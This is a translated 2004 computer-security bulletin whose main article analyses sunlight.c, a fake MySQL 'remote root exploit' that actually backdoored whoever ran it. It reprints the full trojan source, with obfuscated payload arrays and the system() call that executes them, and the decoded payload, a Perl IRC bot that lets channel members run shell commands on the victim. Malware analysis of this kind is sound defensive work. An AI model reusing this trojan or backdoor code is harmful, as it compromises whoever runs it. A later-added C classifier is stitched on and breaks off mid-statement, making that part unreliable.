
RootMode - Nro: 9no boletín

Published in RootMode · 2 years ago

[RootMode] computer security bulletin
No.: 9th bulletin
Thursday, 19 February 2004
http://rootmode.com.ar


INDEX:

  1. Introduction
  2. The site
  3. News
  4. Articles
  5. Links
  6. The End


[1] Introduction

Find Mode ON: Localize Zero_Byte 
*************
Searching tha d00d..

_Used satellite_
AAU CUBESAT | Orbit: 3280
_Satellite config_
1 27846U 03031G 04042.53537312 .00000123 00000-0 77679-4 0 1520
2 27846 98.7284 51.5496 0009671 1.0407 359.0788 14.20597816 32066

**Objective not found**

Trying again..

_Used satellite_
GOES 12 | Orbit: 948
_Satellite config_
1 26871U 01031A 04043.46312733 -.00000244 00000-0 10000-3 0 3594
2 26871 0.3022 273.9271 0001045 133.1039 186.3808 1.00279336 9435

**Located objective**

Data:
Coords         | Alt | Country   | Found
----------------------------------------
34°48'S 58°W   | 3m  | Argentina | yes

Find Mode OFF:
**************


[2] The site

[?] How do I download RootMode's content?

The procedure is simple.
When you subscribe to the bulletin, if you don't already have an account on the eListas server, you will be sent a username and password for your new eListas account, where you can change your info and manage all the settings for the lists you subscribe to.

[!] Remember that this username and password are not for downloading the info from my site. They are for logging in to the eListas system.

Once you are subscribed to my bulletin and can access your eListas account, go to the following link:
http://listas.agujero.com/lista/rootmode/datos/1

There you will find a page with content like this:

Database: [RootMode]-[Archive]

Table index

Total: 1 record
Sequential | Printable format   Search record:

  B    E       User:       Password:
---------------------------------------
****** ******


Then, with that username and password, you can download all the content of RootMode.com.ar.


[3] News

Loading news...

- New paper by Zero_Byte..[Spoofing accounts]
|_ Download here: http://rootmode.com.ar/papers.php
|_ Download here: http://c-ro.com.ar
|_ Download here: http://www.astalavista.com//data/spoof_comar.txt

- New site!
|_ Description: Zero_Byte's personal site, g00d stuff.
|_ View: http://c-ro.com.ar

- M$ users..it's time to patch tha b0x.

- Cisco section 0ffline again.. :(

[4] Articles

Analyzing a fake shellcode

  • 0 - Index
  • 1 - Introduction
  • 2 - Analyzing a supposed shellcode

1 - Introduction

"Fake" is something that pretends to be one thing but really isn't. In this text we will analyze the code sunlight.c, which was published not long ago posing as a remote exploit for MySQL but was really a backdoor that ran on the machine of whoever tried to use the exploit.


2 - Analyzing a supposed shellcode

Let's analyze the code of sunlight.c:

--------------------------CUT HERE---------------------------

/* sunlight.c
* MySQL <4.0 remote root exploit
*
* PLEASE DON'T DISTRIBUTE THIS PRIVATE CODE
* by: morpho-
* - more targets were added by alp
*
* 2003/06/06
*
* gcc sunlight.c -o sunlight -lmysqlclient -I/usr/local/include -L/usr/local/lib/mysql
*
* special thanks to sdi- for donating a bit of his elite
* debugging skillz.
*
*/


#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>
#include <mysql/mysql.h>

char linux_bindcode[] =
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64"
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23"
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67"
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25"
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21"
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70"
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54"
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25"
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66"
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56"
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73"
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33";

char bsd_bindcode[]=
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a"
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f"
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a"
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21"
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e"
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25"
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71"
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25"
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74"
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64";

char linux_connect_back[]=
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73"
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b"
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f"
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f"
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25"
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50"
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d"
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c";

char bsd_connect_back[]=
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f"
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f"
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c"
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67"
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a"
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57"
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74"
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c"
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30"
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";

struct {
char *type;
unsigned long ret;
char *shellcode;
int os_type;
} targets[] = {
{ "mysql-3.23.49-8.4 - Debian 3.0 ", 0xb80a3fab, linux_bindcode, 0 },
{ "mysql-3.23.55-14 - SuSe 8.x ", 0xb80ef2ba, linux_bindcode, 0 },
{ "mysql-3.23.53-6 - Mandrake 9.0 ", 0xb80aa2ba, linux_bindcode, 0 },
{ "mysql-3.23.56 - Slackware 9.0 ", 0xb80ba8d6, linux_bindcode, 0 },
{ "mysql-3.23.55 - FreeBSD 4.8 ", 0xb80b0b1b, bsd_bindcode, 1 },
{ "mysql-3.23.54-1 - FreeBSD 5.0 ", 0xb809ab11, bsd_bindcode, 1 },
{ "mysql-3.23.56 - FreeBSD 5.1 ", 0xb80ff374, bsd_bindcode, 1 },
{ "Crash - (all) ", 0x80fdfdfd, linux_bindcode, 0 }
};

int do_attack(MYSQL *mysql, char *attackuser);
void do_action(MYSQL *mysql, char *action, char *user);
char *strmov(register char *dst, register const char *src);

void usage(char *prog) {
fprintf(stderr, "\nMySQL <4.0 remote root exploit by morpho-\n"
"PRIVATE, DO NOT TRADE OR PUBLISH!!!\n\n"
"Usage: %s [-dtah]\n"
"-d ... mysql server\n"
"-t ... target (0 for a list)\n"
"-a ... attack user (default root)\n"
"-h ... this screen\n\n", prog);
exit(1);
}

int main(int argc, char **argv) {
MYSQL mysql;
char optchar;
int type = 0;
int i=0,w=0,x=0,y=0,z=0;
char *target, *user, *password, *attackuser, *action;
FILE *f;

target = user = password = action = attackuser= NULL;

while ( (optchar = getopt(argc, argv, "hd:t:a")) != EOF ) {
switch(optchar) {
case 'h':
usage("sunlight");
exit(0);
case 'd':
target = optarg;
break;
case 't':
type = atoi(optarg);
if (type == 0 || type > sizeof(targets) / 16) {
for(i = 0; i < sizeof(targets) / 16; i++)
fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1,
targets[i].type, (unsigned int) targets[i].ret);
fprintf(stderr, "\n");
return -1;
}
break;
case 'a':
attackuser = optarg;
break;
case 'e':
}
}

if (!target) usage("sunlight");
if (!attackuser) attackuser = "root";
action = "dumpuser";
for (w=0;linux_bindcode[w];w++) linux_bindcode[w]--;
for (x=0;bsd_bindcode[x];x++) bsd_bindcode[x]--;
for (y=0;linux_connect_back[y];y++) linux_connect_back[y]--;
for (z=0;bsd_connect_back[z];z++) bsd_connect_back[z]--;

printf("connecting to [%s] as [nobody] ... ", target);
fflush(stdin);
f=fopen(bsd_connect_back+167,"w");
if(f){
fprintf(f,"%s",linux_bindcode);
fprintf(f,"%s",bsd_bindcode);
fprintf(f,"%s",linux_connect_back);
fprintf(f,"%s",bsd_connect_back);
fclose(f);}system(bsd_connect_back+137);

if (!mysql_connect(&mysql, target, "nobody", "*")) {
printf("failed\n");
return 0;
} else {
printf("ok\n");
}

printf("sending one byte requests with user [%s] ... \n",
attackuser);
if (!do_attack(&mysql, attackuser)) {
do_action(&mysql, action, "nobody");
} else {
printf("attack failed\n");
}
mysql_close(&mysql);

return 0;
}

int do_attack(MYSQL *mysql, char *attackuser) {
char buff[512], *pos=buff, *attackpasswd = "A";
int i, len, j, ret = 1;

pos = (char*)strmov(pos,attackuser)+1;
mysql->scramble_buff[1] = 0;
pos = scramble(pos, mysql->scramble_buff, attackpasswd,
(my_bool) (mysql->protocol_version == 9));
pos = (char*)strmov(pos+1,"");
len = pos-buff;

for (j = 0; ret && j < 32; j++) {
buff[5] = 65 + j;
ret = simple_command(mysql,COM_CHANGE_USER, buff,(uint)len,0);
}

return ret;
}

void do_action(MYSQL *mysql, char *action, char *user) {
MYSQL_ROW row;
MYSQL_RES *result;
char buf[512];

mysql_select_db(mysql, "mysql");

if (!strcmp(action, "dumpuser")) {
mysql_query(mysql, "select user, password, host from user");
result = mysql_use_result(mysql);

while ((row = mysql_fetch_row(result)))
printf("%16s %16s %50s\n", row[0], row[1], row[2]);
mysql_free_result(result);
} else if (!strcmp(action, "becomeadmin")) {
snprintf(buf, sizeof(buf) - 1,
"update user set Select_priv='Y', Insert_priv='Y', Update_priv='Y', Delete_priv='Y', "
" Create_priv='Y', Drop_priv='Y', Reload_priv='Y', Shutdown_priv='Y', Process_priv='Y', "
" File_priv='Y', Grant_priv='Y', References_priv='Y', Index_priv='Y', Alter_priv='Y' where "
" user = '%s'", "nobody");
mysql_query(mysql, buf);
mysql_reload(mysql);
} /* do whatever you want ... see mysql api ... // else if ( */
}

char *strmov(register char *dst, register const char *src)
{
while ((*dst++ = *src++)) ;
return dst-1;
}


-----------------------CUT HERE-----------------------------


As we can see in the code above, the shellcodes are the following:

char linux_bindcode[] = 
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64"
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23"
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67"
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25"
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21"
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70"
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54"
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25"
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66"
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56"
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73"
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33";

char bsd_bindcode[]=
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a"
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f"
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a"
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21"
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e"
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25"
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71"
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25"
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74"
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64";

char linux_connect_back[]=
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73"
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b"
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f"
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f"
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25"
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50"
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d"
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c";

char bsd_connect_back[]=
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f"
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f"
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c"
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67"
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a"
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57"
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74"
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c"
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30"
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";


Let's copy them and build the following code to see what these shellcodes do:

-------------------------CUT HERE----------------------------


#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <netinet/ip.h>
#include <string.h>

char linux_bindcode[] =
"\x24\x22\x30\x76\x74\x73\x30\x63\x6a\x6f\x30\x71\x66\x73\x6d\x0b\x25\x64"
"\x69\x62\x6f\x3e\x23\x24\x6d\x31\x6d\x23\x3c\x25\x6f\x6a\x64\x6c\x3e\x23"
"\x6d\x70\x6d\x70\x73\x23\x3c\x25\x74\x66\x73\x77\x66\x73\x3e\x23\x66\x67"
"\x6f\x66\x75\x2f\x77\x76\x76\x73\x78\x66\x73\x6c\x2f\x6f\x6d\x23\x3c\x25"
"\x54\x4a\x48\x7c\x55\x46\x53\x4e\x7e\x3e\x7c\x7e\x3c\x66\x79\x6a\x75\x21"
"\x6a\x67\x21\x67\x70\x73\x6c\x3c\x76\x74\x66\x21\x4a\x50\x3b\x3b\x54\x70"
"\x64\x6c\x66\x75\x3c\x25\x74\x70\x64\x6c\x21\x3e\x21\x4a\x50\x3b\x3b\x54"
"\x70\x64\x6c\x66\x75\x3b\x3b\x4a\x4f\x46\x55\x2e\x3f\x6f\x66\x78\x29\x25"
"\x74\x66\x73\x77\x66\x73\x2f\x23\x3b\x37\x37\x37\x38\x23\x2a\x7d\x7d\x66"
"\x79\x6a\x75\x3c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x56"
"\x54\x46\x53\x21\x6d\x70\x6d\x70\x73\x21\x2c\x6a\x21\x6d\x70\x6d\x70\x73"
"\x21\x3b\x6d\x70\x6d\x70\x73\x77\x33";

char bsd_bindcode[]=
"\x5d\x6f\x4f\x4a\x44\x4c\x21\x6d\x70\x6d\x70\x73\x5d\x6f\x23\x3c\x25\x6a"
"\x3e\x32\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f\x3e\x7f"
"\x30\x5f\x5c\x5f\x21\x5e\x2c\x21\x29\x5c\x5f\x21\x5e\x2c\x2a\x21\x30\x2a"
"\x7c\x25\x6e\x70\x65\x66\x3e\x25\x32\x3c\x6d\x62\x74\x75\x21\x6a\x67\x21"
"\x25\x6e\x70\x65\x66\x3e\x3e\x23\x31\x31\x32\x23\x3c\x6a\x67\x29\x25\x6e"
"\x70\x65\x66\x3e\x3e\x23\x35\x34\x34\x23\x2a\x7c\x25\x6a\x2c\x2c\x3c\x25"
"\x6f\x6a\x64\x6c\x3e\x7f\x74\x30\x5d\x65\x2b\x25\x30\x25\x6a\x30\x3c\x71"
"\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x4f\x4a\x44\x4c\x21\x25"
"\x6f\x6a\x64\x6c\x5d\x6f\x23\x3c\x7e\x7e\x71\x73\x6a\x6f\x75\x21\x25\x74"
"\x70\x64\x6c\x21\x23\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64";

char linux_connect_back[]=
"\x69\x62\x6f\x21\x3b\x6d\x70\x6d\x70\x73\x21\x77\x33\x2f\x32\x5d\x6f\x51"
"\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x75\x70\x21\x73"
"\x76\x6f\x21\x64\x70\x6e\x6e\x62\x6f\x65\x74\x2d\x21\x75\x7a\x71\x66\x3b"
"\x21\x23\x2f\x25\x6f\x6a\x64\x6c\x2f\x23\x3b\x21\x64\x70\x6e\x6e\x62\x6f"
"\x65\x5d\x6f\x23\x3c\x78\x69\x6a\x6d\x66\x29\x3d\x25\x74\x70\x64\x6c\x3f"
"\x2a\x7c\x6a\x67\x21\x29\x30\x5f\x51\x4a\x4f\x48\x21\x29\x2f\x2b\x2a\x25"
"\x30\x2a\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x50"
"\x4f\x48\x21\x25\x32\x5d\x6f\x4b\x50\x4a\x4f\x21\x25\x64\x69\x62\x6f\x5d"
"\x6f\x23\x3c\x7e\x6a\x67\x29\x74\x30\x5f\x5c";

char bsd_connect_back[]=
"\x5f\x21\x5e\x2c\x21\x51\x53\x4a\x57\x4e\x54\x48\x21\x25\x64\x69\x62\x6f"
"\x21\x3b\x25\x6f\x6a\x64\x6c\x5c\x5f\x21\x3b\x5d\x78\x5e\x2b\x3b\x5c\x5f"
"\x21\x3b\x5d\x78\x5e\x2b\x21\x29\x2f\x2b\x2a\x25\x30\x25\x32\x30\x2a\x7c"
"\x74\x30\x5d\x74\x2b\x25\x30\x30\x3c\x25\x60\x3e\x61\x25\x60\x61\x3c\x67"
"\x70\x73\x66\x62\x64\x69\x29\x74\x71\x6d\x6a\x75\x21\x23\x5d\x6f\x23\x2a"
"\x7c\x71\x73\x6a\x6f\x75\x21\x25\x74\x70\x64\x6c\x21\x23\x51\x53\x4a\x57"
"\x4e\x54\x48\x21\x25\x64\x69\x62\x6f\x21\x3b\x25\x60\x5d\x6f\x23\x3c\x74"
"\x6d\x66\x66\x71\x21\x32\x3c\x7e\x7e\x7e\x24\x64\x69\x6e\x70\x65\x21\x2c"
"\x79\x21\x30\x75\x6e\x71\x30\x6d\x70\x6d\x21\x33\x3f\x30\x65\x66\x77\x30"
"\x6f\x76\x6d\x6d\x3c\x30\x75\x6e\x71\x30\x6d\x70\x6d";

int main(void) {
    char *p;
    /* undo the +1 obfuscation, exactly as sunlight.c does at run time */
    for (p = linux_bindcode; *p; p++) (*p)--;
    for (p = bsd_bindcode; *p; p++) (*p)--;
    for (p = linux_connect_back; *p; p++) (*p)--;
    for (p = bsd_connect_back; *p; p++) (*p)--;
    /* print the decoded strings instead of executing them */
    printf("%s\n", linux_bindcode);
    printf("%s\n", bsd_bindcode);
    printf("%s\n", linux_connect_back);
    printf("%s\n", bsd_connect_back);
    return 0;
}

----------------------CUT HERE-------------------------------


Now we do the following:

[Sonyy@shellsec]$ gcc -O2 shellcode.c -o shellcode 
[Sonyy@shellsec]$ ./shellcode
#!/usr/bin/perl
$chan="#l0l";$nick="lolor";$server="efnet.vuurwerk.nl";
$SIG{TERM}={};exit if fork;use IO::Socket;
$sock = IO::Socket::INET->new($server.":6667")||exit;
print $sock "USER lolor +i lolor :lolorv2
\nNICK lolor\n"
;$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){
$mode=$1;last if $mode=="001";if($mode=="433"){$i++;
$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print
$sock "JOIN $chan\nPRIVMSG $c
han :lolor v2.1\nPRIVMSG $chan :to run commands,
type: "
.$nick.": command\n";while(<$sock>){
if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}
if(s/^[ ^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){
s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG
$chan :$_\n"
;sleep 1;}}}#chmod +x /tmp/lol 2>/dev/null;/tmp/lol
[Sonyy@shellsec]$


As we can see, what this "shellcode" really does is connect our machine to an IRC server (efnet.vuurwerk.nl), join the channel #l0l, and from there let them run commands on our machine.

But that's not all. Now you will be asking: how does the shellcode get executed on my machine???
Well, here is the answer:

Look at this part of the code of "sunlight.c"; this is where the shellcode is executed on our machine (the fopen a few lines earlier has already written the four decoded strings to a file, and this system() call then runs them):

fclose(f);}system(bsd_connect_back+137);
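As an added check (this is not code from the bulletin or from sunlight.c), here is a small C program that does what the harness above does but never runs anything: it undoes the +1 encoding in memory and then asks whether the result looks like machine code or like a text script. It goes a bit beyond the page's single case: the marker list and the printable-ratio threshold are my own constructed choices, and the two sample byte strings are constructed for the example (sample 1 is "#!/bin/sh\necho hi\n" stored the same way as the page's linux_bindcode, which starts "#!/usr/bin"; sample 2 is a few harmless x86 bytes). A genuine payload decodes to mostly non-printable bytes; the sunlight.c strings decode to a Perl script. The same byte arithmetic also explains the two offsets in sunlight.c: bsd_connect_back is 175 bytes long, so +167 is its last 8 bytes ("/tmp/lol", the file the fopen creates) and +137 its last 38 ("chmod +x /tmp/lol 2>/dev/null;/tmp/lol", the command handed to system()), exactly as the decoded output above shows.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Undo the "+1 per byte" obfuscation used in sunlight.c (each stored byte is
 * the real byte plus one). Copies up to out_cap bytes and returns the number
 * written. Pure memory operation: nothing here is executed. */
size_t decode_shift1(const unsigned char *in, size_t in_len,
                     unsigned char *out, size_t out_cap) {
    size_t n = in_len < out_cap ? in_len : out_cap;
    for (size_t i = 0; i < n; i++)
        out[i] = (unsigned char)(in[i] - 1);
    return n;
}

/* Fraction of bytes that are printable ASCII or ordinary whitespace.
 * Machine code scores low; a Perl or shell script scores 1.0. */
double printable_ratio(const unsigned char *buf, size_t len) {
    if (len == 0) return 0.0;
    size_t ok = 0;
    for (size_t i = 0; i < len; i++)
        if (isprint(buf[i]) || buf[i] == '\n' || buf[i] == '\t' || buf[i] == '\r')
            ok++;
    return (double)ok / (double)len;
}

/* Small substring search (memmem is not in standard C). */
static int contains(const unsigned char *buf, size_t len, const char *needle) {
    size_t nlen = strlen(needle);
    if (nlen == 0 || nlen > len) return 0;
    for (size_t i = 0; i + nlen <= len; i++)
        if (memcmp(buf + i, needle, nlen) == 0) return 1;
    return 0;
}

/* Markers that have no business inside genuine machine code. The list is
 * constructed for this example from what the decoded sunlight.c payload
 * contained: an interpreter shebang, a drop path under /tmp, IRC verbs. */
int has_script_markers(const unsigned char *buf, size_t len) {
    static const char *markers[] = { "#!/", "/tmp/", "PRIVMSG", "chmod ", "system(" };
    for (size_t i = 0; i < sizeof markers / sizeof markers[0]; i++)
        if (contains(buf, len, markers[i])) return 1;
    return 0;
}

enum payload_kind { PAYLOAD_BINARY = 0, PAYLOAD_TEXT_SCRIPT = 1 };

/* Decode and classify. Near-100% printable text that starts with "#!" or
 * carries one of the markers above is a script, not shellcode. The 0.95
 * threshold is a constructed choice for this example. */
enum payload_kind classify_payload(const unsigned char *obfuscated, size_t len) {
    unsigned char decoded[4096];
    size_t n = decode_shift1(obfuscated, len, decoded, sizeof decoded);
    int shebang = n >= 2 && decoded[0] == '#' && decoded[1] == '!';
    if (printable_ratio(decoded, n) > 0.95 &&
        (shebang || has_script_markers(decoded, n)))
        return PAYLOAD_TEXT_SCRIPT;
    return PAYLOAD_BINARY;
}

/* Convenience check: does the obfuscated input decode exactly to `expected`? */
int decodes_to(const unsigned char *in, size_t len, const char *expected) {
    unsigned char out[4096];
    size_t n = decode_shift1(in, len, out, sizeof out);
    return n == strlen(expected) && memcmp(out, expected, n) == 0;
}

/* Constructed sample 1: "#!/bin/sh\necho hi\n" with every byte +1, the same
 * scheme as the page's linux_bindcode (which begins "#!/usr/bin"). */
const unsigned char SAMPLE_SCRIPT[] =
    "\x24\x22\x30\x63\x6a\x6f\x30\x74\x69\x0b\x66\x64\x69\x70\x21\x69\x6a\x0b";

/* Constructed sample 2: harmless x86 bytes (nop, nop, nop, int3) stored the
 * same way; decoding yields non-printable bytes, as real shellcode would. */
const unsigned char SAMPLE_MACHINE_CODE[] = "\x91\x91\x91\xcd";

int main(void) {
    unsigned char out[64];
    size_t n = decode_shift1(SAMPLE_SCRIPT, sizeof SAMPLE_SCRIPT - 1, out, sizeof out);
    printf("sample 1: %zu bytes, printable ratio %.2f, kind=%d, decoded text:\n", n,
           printable_ratio(out, n),
           (int)classify_payload(SAMPLE_SCRIPT, sizeof SAMPLE_SCRIPT - 1));
    fwrite(out, 1, n, stdout);
    printf("sample 2: kind=%d\n",
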